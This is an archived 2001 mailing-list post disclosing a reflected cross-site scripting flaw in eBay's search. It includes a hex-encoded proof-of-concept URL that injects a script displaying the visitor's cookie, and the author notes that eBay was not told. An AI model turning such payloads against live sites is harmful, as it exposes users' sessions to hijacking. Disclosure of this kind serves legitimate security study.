('binary' encoding is not supported, stored as-is) There is a cross-site scripting vulnerability within the search code @ ebay.com Below is the proof of concept URL & is harmless.. make sure it is entered exactly as it is shown. Of course, if you have ANY brains AT ALL.. you will verify the hex values in the URL before processing the link. Basically, it just document.write's the cookie that ebay.com stores in your browser. However, there are many more possibilities.. ebay has not been notified. http://cq-search.ebay.com/search/search.dll?query=%70%68%69%6e%65%20%30%77%6e%73%20%29%3c%2f%54%49%54%4c%45%3e%3c%53%43%52%49%50%54%3e%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%42%3e%59%6f%75%72%20%43%6f%6f%6b%69%65%20%49%73%20%42%65%6c%6f%77%3a%3c%2f%42%3e%3c%42%52%20%2f%3e%27%20%2b%20%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b%3c%2f%53%43%52%49%50%54%3e<BR+/><CENTER><B>...Your+0wner+is+above...</B><BR+/>(in+the+TITLE+tag...+d0h!)<P+/>..<B>greetz</B>..<BR+/>s1gnal_9,+Narr0w,+%23!security+and+PBS+;]</CENTER><P+/><FONT+FACE="Arial"+SIZE="2px"><B>So+many+new+IE+bugz+out...+So+many+new+possibilities!</B><BR+/>Where+Do+You+Want+To+Go+Today?®</FONT><P+/><TITLE>+(+heh. Try playing with cnet /*you just might find something interesting*/ ;] 'phine ------------------------------------------------------------ This email was sent through the free email service at http://www.anonymous.to/ To report abuse, please visit our website and click 'Contact Us.'
This archive was generated by hypermail 2b30 : Tue Dec 18 2001 - 19:29:01 PST